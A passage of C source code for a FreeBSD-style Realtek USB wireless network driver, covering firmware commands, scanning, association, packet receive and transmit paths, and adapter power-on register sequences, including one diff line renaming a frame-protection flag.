= R92S_KEY_ALGO_AES; break; default: return; } key.id = k->wk_keyix; key.grpkey = (k->wk_flags & IEEE80211_KEY_GROUP) != 0; memcpy(key.key, k->wk_key, MIN(k->wk_keylen, sizeof(key.key))); (void)rsu_fw_cmd(sc, R92S_CMD_SET_KEY, &key, sizeof(key)); } static void rsu_delete_key(struct rsu_softc *sc, const struct ieee80211_key *k) { struct r92s_fw_cmd_set_key key; memset(&key, 0, sizeof(key)); key.id = k->wk_keyix; (void)rsu_fw_cmd(sc, R92S_CMD_SET_KEY, &key, sizeof(key)); } #endif static int rsu_site_survey(struct rsu_softc *sc, struct ieee80211vap *vap) { struct r92s_fw_cmd_sitesurvey cmd; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; memset(&cmd, 0, sizeof(cmd)); if ((ic->ic_flags & IEEE80211_F_ASCAN) || sc->scan_pass == 1) cmd.active = htole32(1); cmd.limit = htole32(48); if (sc->scan_pass == 1 && vap->iv_des_nssid > 0) { /* Do a directed scan for second pass. */ cmd.ssidlen = htole32(vap->iv_des_ssid[0].len); memcpy(cmd.ssid, vap->iv_des_ssid[0].ssid, vap->iv_des_ssid[0].len); } DPRINTF("sending site survey command, pass=%d\n", sc->scan_pass); return (rsu_fw_cmd(sc, R92S_CMD_SITE_SURVEY, &cmd, sizeof(cmd))); } static int rsu_join_bss(struct rsu_softc *sc, struct ieee80211_node *ni) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct ndis_wlan_bssid_ex *bss; struct ndis_802_11_fixed_ies *fixed; struct r92s_fw_cmd_auth auth; uint8_t buf[sizeof(*bss) + 128], *frm; uint8_t opmode; int error; /* Let the FW decide the opmode based on the capinfo field. */ opmode = NDIS802_11AUTOUNKNOWN; DPRINTF("setting operating mode to %d\n", opmode); error = rsu_fw_cmd(sc, R92S_CMD_SET_OPMODE, &opmode, sizeof(opmode)); if (error != 0) return (error); memset(&auth, 0, sizeof(auth)); if (vap->iv_flags & IEEE80211_F_WPA) { auth.mode = R92S_AUTHMODE_WPA; auth.dot1x = ni->ni_authmode == IEEE80211_AUTH_8021X; } else auth.mode = R92S_AUTHMODE_OPEN; DPRINTF("setting auth mode to %d\n", auth.mode); error = rsu_fw_cmd(sc, R92S_CMD_SET_AUTH, &auth, sizeof(auth)); if (error != 0) return (error); memset(buf, 0, sizeof(buf)); bss = (struct ndis_wlan_bssid_ex *)buf; IEEE80211_ADDR_COPY(bss->macaddr, ni->ni_bssid); bss->ssid.ssidlen = htole32(ni->ni_esslen); memcpy(bss->ssid.ssid, ni->ni_essid, ni->ni_esslen); if (vap->iv_flags & (IEEE80211_F_PRIVACY | IEEE80211_F_WPA)) bss->privacy = htole32(1); bss->rssi = htole32(ni->ni_avgrssi); if (ic->ic_curmode == IEEE80211_MODE_11B) bss->networktype = htole32(NDIS802_11DS); else bss->networktype = htole32(NDIS802_11OFDM24); bss->config.len = htole32(sizeof(bss->config)); bss->config.bintval = htole32(ni->ni_intval); bss->config.dsconfig = htole32(ieee80211_chan2ieee(ic, ni->ni_chan)); bss->inframode = htole32(NDIS802_11INFRASTRUCTURE); memcpy(bss->supprates, ni->ni_rates.rs_rates, ni->ni_rates.rs_nrates); /* Write the fixed fields of the beacon frame. */ fixed = (struct ndis_802_11_fixed_ies *)&bss[1]; memcpy(&fixed->tstamp, ni->ni_tstamp.data, 8); fixed->bintval = htole16(ni->ni_intval); fixed->capabilities = htole16(ni->ni_capinfo); /* Write IEs to be included in the association request. */ frm = (uint8_t *)&fixed[1]; frm = ieee80211_add_rsn(frm, vap); frm = ieee80211_add_wpa(frm, vap); frm = ieee80211_add_qos(frm, ni); if (ni->ni_flags & IEEE80211_NODE_HT) frm = ieee80211_add_htcap(frm, ni); bss->ieslen = htole32(frm - (uint8_t *)fixed); bss->len = htole32(((frm - buf) + 3) & ~3); DPRINTF("sending join bss command to %s chan %d\n", ether_sprintf(bss->macaddr), le32toh(bss->config.dsconfig)); return (rsu_fw_cmd(sc, R92S_CMD_JOIN_BSS, buf, sizeof(buf))); } static int rsu_disconnect(struct rsu_softc *sc) { uint32_t zero = 0; /* :-) */ /* Disassociate from our current BSS. */ DPRINTF("sending disconnect command\n"); return (rsu_fw_cmd(sc, R92S_CMD_DISCONNECT, &zero, sizeof(zero))); } static void rsu_event_survey(struct rsu_softc *sc, uint8_t *buf, int len) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_channel *c; struct ndis_wlan_bssid_ex *bss; struct mbuf *m; int pktlen; if (__predict_false(len < sizeof(*bss))) return; bss = (struct ndis_wlan_bssid_ex *)buf; if (__predict_false(len < sizeof(*bss) + le32toh(bss->ieslen))) return; DPRINTFN(2, "found BSS %s: len=%d chan=%d inframode=%d " "networktype=%d privacy=%d\n", ether_sprintf(bss->macaddr), le32toh(bss->len), le32toh(bss->config.dsconfig), le32toh(bss->inframode), le32toh(bss->networktype), le32toh(bss->privacy)); /* Build a fake beacon frame to let net80211 do all the parsing. */ pktlen = sizeof(*wh) + le32toh(bss->ieslen); if (__predict_false(pktlen > MCLBYTES)) return; MGETHDR(m, M_DONTWAIT, MT_DATA); if (__predict_false(m == NULL)) return; if (pktlen > MHLEN) { MCLGET(m, M_DONTWAIT); if (!(m->m_flags & M_EXT)) { m_free(m); return; } } wh = mtod(m, struct ieee80211_frame *); wh->i_fc[0] = IEEE80211_FC0_VERSION_0 | IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_BEACON; wh->i_fc[1] = IEEE80211_FC1_DIR_NODS; USETW(wh->i_dur, 0); IEEE80211_ADDR_COPY(wh->i_addr1, ifp->if_broadcastaddr); IEEE80211_ADDR_COPY(wh->i_addr2, bss->macaddr); IEEE80211_ADDR_COPY(wh->i_addr3, bss->macaddr); *(uint16_t *)wh->i_seq = 0; memcpy(&wh[1], (uint8_t *)&bss[1], le32toh(bss->ieslen)); /* Finalize mbuf. */ m->m_pkthdr.len = m->m_len = pktlen; m->m_pkthdr.rcvif = ifp; /* Fix the channel. */ c = ieee80211_find_channel_byieee(ic, le32toh(bss->config.dsconfig), IEEE80211_CHAN_G); if (c) { ic->ic_curchan = c; ieee80211_radiotap_chan_change(ic); } /* XXX avoid a LOR */ RSU_UNLOCK(sc); ieee80211_input_all(ic, m, le32toh(bss->rssi), 0); RSU_LOCK(sc); } static void rsu_event_join_bss(struct rsu_softc *sc, uint8_t *buf, int len) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni = vap->iv_bss; struct r92s_event_join_bss *rsp; int res; if (__predict_false(len < sizeof(*rsp))) return; rsp = (struct r92s_event_join_bss *)buf; res = (int)le32toh(rsp->join_res); DPRINTF("Rx join BSS event len=%d res=%d\n", len, res); if (res <= 0) { RSU_UNLOCK(sc); ieee80211_new_state(vap, IEEE80211_S_SCAN, -1); RSU_LOCK(sc); return; } DPRINTF("associated with %s associd=%d\n", ether_sprintf(rsp->bss.macaddr), le32toh(rsp->associd)); ni->ni_associd = le32toh(rsp->associd) | 0xc000; RSU_UNLOCK(sc); ieee80211_new_state(vap, IEEE80211_S_RUN, IEEE80211_FC0_SUBTYPE_ASSOC_RESP); RSU_LOCK(sc); } static void rsu_rx_event(struct rsu_softc *sc, uint8_t code, uint8_t *buf, int len) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); DPRINTFN(4, "Rx event code=%d len=%d\n", code, len); switch (code) { case R92S_EVT_SURVEY: if (vap->iv_state == IEEE80211_S_SCAN) rsu_event_survey(sc, buf, len); break; case R92S_EVT_SURVEY_DONE: DPRINTF("site survey pass %d done, found %d BSS\n", sc->scan_pass, le32toh(*(uint32_t *)buf)); if (vap->iv_state != IEEE80211_S_SCAN) break; /* Ignore if not scanning. */ if (sc->scan_pass == 0 && vap->iv_des_nssid != 0) { /* Schedule a directed scan for hidden APs. */ sc->scan_pass = 1; RSU_UNLOCK(sc); ieee80211_new_state(vap, IEEE80211_S_SCAN, -1); RSU_LOCK(sc); break; } sc->scan_pass = 0; break; case R92S_EVT_JOIN_BSS: if (vap->iv_state == IEEE80211_S_AUTH) rsu_event_join_bss(sc, buf, len); break; case R92S_EVT_DEL_STA: DPRINTF("disassociated from %s\n", ether_sprintf(buf)); if (vap->iv_state == IEEE80211_S_RUN && IEEE80211_ADDR_EQ(vap->iv_bss->ni_bssid, buf)) { RSU_UNLOCK(sc); ieee80211_new_state(vap, IEEE80211_S_SCAN, -1); RSU_LOCK(sc); } break; case R92S_EVT_WPS_PBC: DPRINTF("WPS PBC pushed.\n"); break; case R92S_EVT_FWDBG: if (ifp->if_flags & IFF_DEBUG) { buf[60] = '\0'; printf("FWDBG: %s\n", (char *)buf); } break; } } static void rsu_rx_multi_event(struct rsu_softc *sc, uint8_t *buf, int len) { struct r92s_fw_cmd_hdr *cmd; int cmdsz; DPRINTFN(6, "Rx events len=%d\n", len); /* Skip Rx status. */ buf += sizeof(struct r92s_rx_stat); len -= sizeof(struct r92s_rx_stat); /* Process all events. */ for (;;) { /* Check that command header fits. */ if (__predict_false(len < sizeof(*cmd))) break; cmd = (struct r92s_fw_cmd_hdr *)buf; /* Check that command payload fits. */ cmdsz = le16toh(cmd->len); if (__predict_false(len < sizeof(*cmd) + cmdsz)) break; /* Process firmware event. */ rsu_rx_event(sc, cmd->code, (uint8_t *)&cmd[1], cmdsz); if (!(cmd->seq & R92S_FW_CMD_MORE)) break; buf += sizeof(*cmd) + cmdsz; len -= sizeof(*cmd) + cmdsz; } } static int8_t rsu_get_rssi(struct rsu_softc *sc, int rate, void *physt) { static const int8_t cckoff[] = { 14, -2, -20, -40 }; struct r92s_rx_phystat *phy; struct r92s_rx_cck *cck; uint8_t rpt; int8_t rssi; if (rate <= 3) { cck = (struct r92s_rx_cck *)physt; rpt = (cck->agc_rpt >> 6) & 0x3; rssi = cck->agc_rpt & 0x3e; rssi = cckoff[rpt] - rssi; } else { /* OFDM/HT. */ phy = (struct r92s_rx_phystat *)physt; rssi = ((le32toh(phy->phydw1) >> 1) & 0x7f) - 106; } return (rssi); } static struct mbuf * rsu_rx_frame(struct rsu_softc *sc, uint8_t *buf, int pktlen, int *rssi) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct r92s_rx_stat *stat; uint32_t rxdw0, rxdw3; struct mbuf *m; uint8_t rate; int infosz; stat = (struct r92s_rx_stat *)buf; rxdw0 = le32toh(stat->rxdw0); rxdw3 = le32toh(stat->rxdw3); if (__predict_false(rxdw0 & R92S_RXDW0_CRCERR)) { ifp->if_ierrors++; return NULL; } if (__predict_false(pktlen < sizeof(*wh) || pktlen > MCLBYTES)) { ifp->if_ierrors++; return NULL; } rate = MS(rxdw3, R92S_RXDW3_RATE); infosz = MS(rxdw0, R92S_RXDW0_INFOSZ) * 8; /* Get RSSI from PHY status descriptor if present. */ if (infosz != 0) *rssi = rsu_get_rssi(sc, rate, &stat[1]); else *rssi = 0; DPRINTFN(5, "Rx frame len=%d rate=%d infosz=%d rssi=%d\n", pktlen, rate, infosz, *rssi); MGETHDR(m, M_DONTWAIT, MT_DATA); if (__predict_false(m == NULL)) { ifp->if_ierrors++; return NULL; } if (pktlen > MHLEN) { MCLGET(m, M_DONTWAIT); if (__predict_false(!(m->m_flags & M_EXT))) { ifp->if_ierrors++; m_freem(m); return NULL; } } /* Finalize mbuf. */ m->m_pkthdr.rcvif = ifp; /* Hardware does Rx TCP checksum offload. */ if (rxdw3 & R92S_RXDW3_TCPCHKVALID) { if (__predict_true(rxdw3 & R92S_RXDW3_TCPCHKRPT)) m->m_pkthdr.csum_flags |= CSUM_DATA_VALID; } wh = (struct ieee80211_frame *)((uint8_t *)&stat[1] + infosz); memcpy(mtod(m, uint8_t *), wh, pktlen); m->m_pkthdr.len = m->m_len = pktlen; if (ieee80211_radiotap_active(ic)) { struct rsu_rx_radiotap_header *tap = &sc->sc_rxtap; /* Map HW rate index to 802.11 rate. */ tap->wr_flags = 2; if (!(rxdw3 & R92S_RXDW3_HTC)) { switch (rate) { /* CCK. */ case 0: tap->wr_rate = 2; break; case 1: tap->wr_rate = 4; break; case 2: tap->wr_rate = 11; break; case 3: tap->wr_rate = 22; break; /* OFDM. */ case 4: tap->wr_rate = 12; break; case 5: tap->wr_rate = 18; break; case 6: tap->wr_rate = 24; break; case 7: tap->wr_rate = 36; break; case 8: tap->wr_rate = 48; break; case 9: tap->wr_rate = 72; break; case 10: tap->wr_rate = 96; break; case 11: tap->wr_rate = 108; break; } } else if (rate >= 12) { /* MCS0~15. */ /* Bit 7 set means HT MCS instead of rate. */ tap->wr_rate = 0x80 | (rate - 12); } tap->wr_dbm_antsignal = *rssi; tap->wr_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wr_chan_flags = htole16(ic->ic_curchan->ic_flags); } return (m); } static struct mbuf * rsu_rx_multi_frame(struct rsu_softc *sc, uint8_t *buf, int len, int *rssi) { struct r92s_rx_stat *stat; uint32_t rxdw0; int totlen, pktlen, infosz, npkts; struct mbuf *m, *m0 = NULL, *prevm = NULL; /* Get the number of encapsulated frames. */ stat = (struct r92s_rx_stat *)buf; npkts = MS(le32toh(stat->rxdw2), R92S_RXDW2_PKTCNT); DPRINTFN(6, "Rx %d frames in one chunk\n", npkts); /* Process all of them. */ while (npkts-- > 0) { if (__predict_false(len < sizeof(*stat))) break; stat = (struct r92s_rx_stat *)buf; rxdw0 = le32toh(stat->rxdw0); pktlen = MS(rxdw0, R92S_RXDW0_PKTLEN); if (__predict_false(pktlen == 0)) break; infosz = MS(rxdw0, R92S_RXDW0_INFOSZ) * 8; /* Make sure everything fits in xfer. */ totlen = sizeof(*stat) + infosz + pktlen; if (__predict_false(totlen > len)) break; /* Process 802.11 frame. */ m = rsu_rx_frame(sc, buf, pktlen, rssi); if (m0 == NULL) m0 = m; if (prevm == NULL) prevm = m; else { prevm->m_next = m; prevm = m; } /* Next chunk is 128-byte aligned. */ totlen = (totlen + 127) & ~127; buf += totlen; len -= totlen; } return (m0); } static struct mbuf * rsu_rxeof(struct usb_xfer *xfer, struct rsu_data *data, int *rssi) { struct rsu_softc *sc = data->sc; struct r92s_rx_stat *stat; int len; usbd_xfer_status(xfer, &len, NULL, NULL, NULL); if (__predict_false(len < sizeof(*stat))) { DPRINTF("xfer too short %d\n", len); sc->sc_ifp->if_ierrors++; return (NULL); } /* Determine if it is a firmware C2H event or an 802.11 frame. */ stat = (struct r92s_rx_stat *)data->buf; if ((le32toh(stat->rxdw1) & 0x1ff) == 0x1ff) { rsu_rx_multi_event(sc, data->buf, len); /* No packets to process. */ return (NULL); } else return (rsu_rx_multi_frame(sc, data->buf, len, rssi)); } static void rsu_bulk_rx_callback(struct usb_xfer *xfer, usb_error_t error) { struct rsu_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *m = NULL, *next; struct rsu_data *data; int rssi = 1; RSU_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_rx_active); if (data == NULL) goto tr_setup; STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); m = rsu_rxeof(xfer, data, &rssi); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&sc->sc_rx_inactive); if (data == NULL) { KASSERT(m == NULL, ("mbuf isn't NULL")); return; } STAILQ_REMOVE_HEAD(&sc->sc_rx_inactive, next); STAILQ_INSERT_TAIL(&sc->sc_rx_active, data, next); usbd_xfer_set_frame_data(xfer, 0, data->buf, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); /* * To avoid LOR we should unlock our private mutex here to call * ieee80211_input() because here is at the end of a USB * callback and safe to unlock. */ RSU_UNLOCK(sc); while (m != NULL) { next = m->m_next; m->m_next = NULL; wh = mtod(m, struct ieee80211_frame *); ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); if (ni != NULL) { (void)ieee80211_input(ni, m, rssi, 0); ieee80211_free_node(ni); } else (void)ieee80211_input_all(ic, m, rssi, 0); m = next; } RSU_LOCK(sc); break; default: /* needs it to the inactive queue due to a error. */ data = STAILQ_FIRST(&sc->sc_rx_active); if (data != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); ifp->if_ierrors++; goto tr_setup; } break; } } static void rsu_txeof(struct usb_xfer *xfer, struct rsu_data *data) { struct rsu_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; RSU_ASSERT_LOCKED(sc); /* * Do any tx complete callback. Note this must be done before releasing * the node reference. */ if (data->m) { m = data->m; if (m->m_flags & M_TXCB) { /* XXX status? */ ieee80211_process_callback(data->ni, m, 0); } m_freem(m); data->m = NULL; } if (data->ni) { ieee80211_free_node(data->ni); data->ni = NULL; } sc->sc_tx_timer = 0; ifp->if_opackets++; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; } static void rsu_bulk_tx_callback(struct usb_xfer *xfer, usb_error_t error) { struct rsu_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct rsu_data *data; RSU_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto tr_setup; DPRINTF("transfer done %p\n", data); STAILQ_REMOVE_HEAD(&sc->sc_tx_active, next); rsu_txeof(xfer, data); STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data, next); /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&sc->sc_tx_pending); if (data == NULL) { DPRINTF("empty pending queue sc %p\n", sc); return; } STAILQ_REMOVE_HEAD(&sc->sc_tx_pending, next); STAILQ_INSERT_TAIL(&sc->sc_tx_active, data, next); usbd_xfer_set_frame_data(xfer, 0, data->buf, data->buflen); DPRINTF("submitting transfer %p\n", data); usbd_transfer_submit(xfer); rsu_start_locked(ifp); break; default: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto tr_setup; if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; ifp->if_oerrors++; } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static int rsu_tx_start(struct rsu_softc *sc, struct ieee80211_node *ni, struct mbuf *m0, struct rsu_data *data) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_frame *wh; struct ieee80211_key *k = NULL; struct r92s_tx_desc *txd; struct usb_xfer *xfer; uint8_t type, tid = 0; int hasqos, xferlen; struct usb_xfer *rsu_pipes[4] = { sc->sc_xfer[RSU_BULK_TX_BE], sc->sc_xfer[RSU_BULK_TX_BK], sc->sc_xfer[RSU_BULK_TX_VI], sc->sc_xfer[RSU_BULK_TX_VO] }; RSU_ASSERT_LOCKED(sc); wh = mtod(m0, struct ieee80211_frame *); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { device_printf(sc->sc_dev, "ieee80211_crypto_encap returns NULL.\n"); /* XXX we don't expect the fragmented frames */ m_freem(m0); return (ENOBUFS); } wh = mtod(m0, struct ieee80211_frame *); } switch (type) { case IEEE80211_FC0_TYPE_CTL: case IEEE80211_FC0_TYPE_MGT: xfer = sc->sc_xfer[RSU_BULK_TX_VO]; break; default: KASSERT(M_WME_GETAC(m0) < 4, ("unsupported WME pipe %d", M_WME_GETAC(m0))); xfer = rsu_pipes[M_WME_GETAC(m0)]; break; } hasqos = 0; /* Fill Tx descriptor. */ txd = (struct r92s_tx_desc *)data->buf; memset(txd, 0, sizeof(*txd)); txd->txdw0 |= htole32( SM(R92S_TXDW0_PKTLEN, m0->m_pkthdr.len) | SM(R92S_TXDW0_OFFSET, sizeof(*txd)) | R92S_TXDW0_OWN | R92S_TXDW0_FSG | R92S_TXDW0_LSG); txd->txdw1 |= htole32( SM(R92S_TXDW1_MACID, R92S_MACID_BSS) | SM(R92S_TXDW1_QSEL, R92S_TXDW1_QSEL_BE)); if (!hasqos) txd->txdw1 |= htole32(R92S_TXDW1_NONQOS); #ifdef notyet if (k != NULL) { switch (k->wk_cipher->ic_cipher) { case IEEE80211_CIPHER_WEP: cipher = R92S_TXDW1_CIPHER_WEP; break; case IEEE80211_CIPHER_TKIP: cipher = R92S_TXDW1_CIPHER_TKIP; break; case IEEE80211_CIPHER_AES_CCM: cipher = R92S_TXDW1_CIPHER_AES; break; default: cipher = R92S_TXDW1_CIPHER_NONE; } txd->txdw1 |= htole32( SM(R92S_TXDW1_CIPHER, cipher) | SM(R92S_TXDW1_KEYIDX, k->k_id)); } #endif txd->txdw2 |= htole32(R92S_TXDW2_BK); if (IEEE80211_IS_MULTICAST(wh->i_addr1)) txd->txdw2 |= htole32(R92S_TXDW2_BMCAST); /* * Firmware will use and increment the sequence number for the * specified TID. */ txd->txdw3 |= htole32(SM(R92S_TXDW3_SEQ, tid)); if (ieee80211_radiotap_active_vap(vap)) { struct rsu_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wt_chan_flags = htole16(ic->ic_curchan->ic_flags); ieee80211_radiotap_tx(vap, m0); } xferlen = sizeof(*txd) + m0->m_pkthdr.len; m_copydata(m0, 0, m0->m_pkthdr.len, (caddr_t)&txd[1]); data->buflen = xferlen; data->ni = ni; data->m = m0; STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); usbd_transfer_start(xfer); return (0); } static void rsu_start(struct ifnet *ifp) { struct rsu_softc *sc = ifp->if_softc; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; RSU_LOCK(sc); rsu_start_locked(ifp); RSU_UNLOCK(sc); } static void rsu_start_locked(struct ifnet *ifp) { struct rsu_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; struct rsu_data *bf; RSU_ASSERT_LOCKED(sc); for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; bf = rsu_getbuf(sc); if (bf == NULL) { IFQ_DRV_PREPEND(&ifp->if_snd, m); break; } ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; m->m_pkthdr.rcvif = NULL; if (rsu_tx_start(sc, ni, m, bf) != 0) { ifp->if_oerrors++; STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); ieee80211_free_node(ni); break; } sc->sc_tx_timer = 5; callout_reset(&sc->sc_watchdog_ch, hz, rsu_watchdog, sc); } } static void rsu_watchdog(void *arg) { struct rsu_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (sc->sc_tx_timer > 0) { if (--sc->sc_tx_timer == 0) { device_printf(sc->sc_dev, "device timeout\n"); /* rsu_init(ifp); XXX needs a process context! */ ifp->if_oerrors++; return; } callout_reset(&sc->sc_watchdog_ch, hz, rsu_watchdog, sc); } } static int rsu_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: if (ifp->if_flags & IFF_UP) { if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { rsu_init(ifp->if_softc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) rsu_stop(ifp, 1); } if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return (error); } /* * Power on sequence for A-cut adapters. */ static void rsu_power_on_acut(struct rsu_softc *sc) { uint32_t reg; rsu_write_1(sc, R92S_SPS0_CTRL + 1, 0x53); rsu_write_1(sc, R92S_SPS0_CTRL + 0, 0x57); /* Enable AFE macro block's bandgap and Mbias. */ rsu_write_1(sc, R92S_AFE_MISC, rsu_read_1(sc, R92S_AFE_MISC) | R92S_AFE_MISC_BGEN | R92S_AFE_MISC_MBEN); /* Enable LDOA15 block. */ rsu_write_1(sc, R92S_LDOA15_CTRL, rsu_read_1(sc, R92S_LDOA15_CTRL) | R92S_LDA15_EN); rsu_write_1(sc, R92S_SPS1_CTRL, rsu_read_1(sc, R92S_SPS1_CTRL) | R92S_SPS1_LDEN); usb_pause_mtx(&sc->sc_mtx, 2 * hz); /* Enable switch regulator block. */ rsu_write_1(sc, R92S_SPS1_CTRL, rsu_read_1(sc, R92S_SPS1_CTRL) | R92S_SPS1_SWEN); rsu_write_4(sc, R92S_SPS1_CTRL, 0x00a7b267); rsu_write_1(sc, R92S_SYS_ISO_CTRL + 1, rsu_read_1(sc, R92S_SYS_ISO_CTRL + 1) | 0x08); rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, rsu_read_1(sc, R92S_SYS_FUNC_EN + 1) | 0x20); rsu_write_1(sc, R92S_SYS_ISO_CTRL + 1, rsu_read_1(sc, R92S_SYS_ISO_CTRL + 1) & ~0x90); /* Enable AFE clock. */ rsu_write_1(sc, R92S_AFE_XTAL_CTRL + 1, rsu_read_1(sc, R92S_AFE_XTAL_CTRL + 1) & ~0x04); /* Enable AFE PLL macro block. */ rsu_write_1(sc, R92S_AFE_PLL_CTRL, rsu_read_1(sc, R92S_AFE_PLL_CTRL) | 0x11); /* Attach AFE PLL to MACTOP/BB. */ rsu_write_1(sc, R92S_SYS_ISO_CTRL, rsu_read_1(sc, R92S_SYS_ISO_CTRL) & ~0x11); /* Switch to 40MHz clock instead of 80MHz. */ rsu_write_2(sc, R92S_SYS_CLKR, rsu_read_2(sc, R92S_SYS_CLKR) & ~R92S_SYS_CLKSEL); /* Enable MAC clock. */ rsu_write_2(sc, R92S_SYS_CLKR, rsu_read_2(sc, R92S_SYS_CLKR) | R92S_MAC_CLK_EN | R92S_SYS_CLK_EN); rsu_write_1(sc, R92S_PMC_FSM, 0x02); /* Enable digital core and IOREG R/W. */ rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, rsu_read_1(sc, R92S_SYS_FUNC_EN + 1) | 0x08); rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, rsu_read_1(sc, R92S_SYS_FUNC_EN + 1) | 0x80); /* Switch the control path to firmware. */ reg = rsu_read_2(sc, R92S_SYS_CLKR); reg = (reg & ~R92S_SWHW_SEL) | R92S_FWHW_SEL; rsu_write_2(sc, R92S_SYS_CLKR, reg); rsu_write_2(sc, R92S_CR, 0x37fc); /* Fix USB RX FIFO issue. */ rsu_write_1(sc, 0xfe5c, rsu_read_1(sc, 0xfe5c) | 0x80); rsu_write_1(sc, 0x00ab, rsu_read_1(sc, 0x00ab) | 0xc0); rsu_write_1(sc, R92S_SYS_CLKR, rsu_read_1(sc, R92S_SYS_CLKR) & ~R92S_SYS_CPU_CLKSEL); } /* * Power on sequence for B-cut and C-cut adapters. */ static void rsu_power_on_bcut(struct rsu_softc *sc) { uint32_t reg; int ntries; /* Prevent eFuse leakage. */ rsu_write_1(sc, 0x37, 0xb0); usb_pause_mtx(&sc->sc_mtx, 10); rsu_write_1(sc, 0x37, 0x30); /* Switch the control path to hardware. */ reg = rsu_read_2(sc, R92S_SYS_CLKR); if (reg & R92S_FWHW_SEL) { rsu_write_2(sc, R92S_SYS_CLKR, reg & ~(R92S_SWHW_SEL | R92S_FWHW_SEL)); } rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, rsu_read_1(sc, R92S_SYS_FUNC_EN + 1) & ~0x8c); DELAY(1000); rsu_write_1(sc, R92S_SPS0_CTRL + 1, 0x53); rsu_write_1(sc, R92S_SPS0_CTRL + 0, 0x57); reg = rsu_read_1(sc, R92S_AFE_MISC); rsu_write_1(sc, R92S_AFE_MISC, reg | R92S_AFE_MISC_BGEN); rsu_write_1(sc, R92S_AFE_MISC, reg | R92S_AFE_MISC_BGEN | R92S_AFE_MISC_MBEN | R92S_AFE_MISC_I32_EN); /* Enable PLL. */ rsu_write_1(sc, R92S_LDOA15_CTRL, rsu_read_1(sc, R92S_LDOA15_CTRL) | R92S_LDA15_EN); rsu_write_1(sc, R92S_LDOV12D_CTRL, rsu_read_1(sc, R92S_LDOV12D_CTRL) | R92S_LDV12_EN); rsu_write_1(sc, R92S_SYS_ISO_CTRL + 1, rsu_read_1(sc, R92S_SYS_ISO_CTRL + 1) | 0x08); rsu_write_1(sc, R92S_SYS_FUNC_EN + 1, rsu_read_1(sc, R92S_SYS_FUNC_EN + 1) | 0x20); /* Support 64KB IMEM. */ rsu_write_1(sc, R92S_SYS_ISO_CTRL + 1, rsu_read_1(sc, R92S_SYS_ISO_CTRL + 1) & ~0x97); /* Enable AFE clock. */ rsu_write_1(sc, R92S_AFE_XTAL_CTRL + 1, rsu_read_1(sc, R92S_AFE_XTAL_CTRL + 1) & 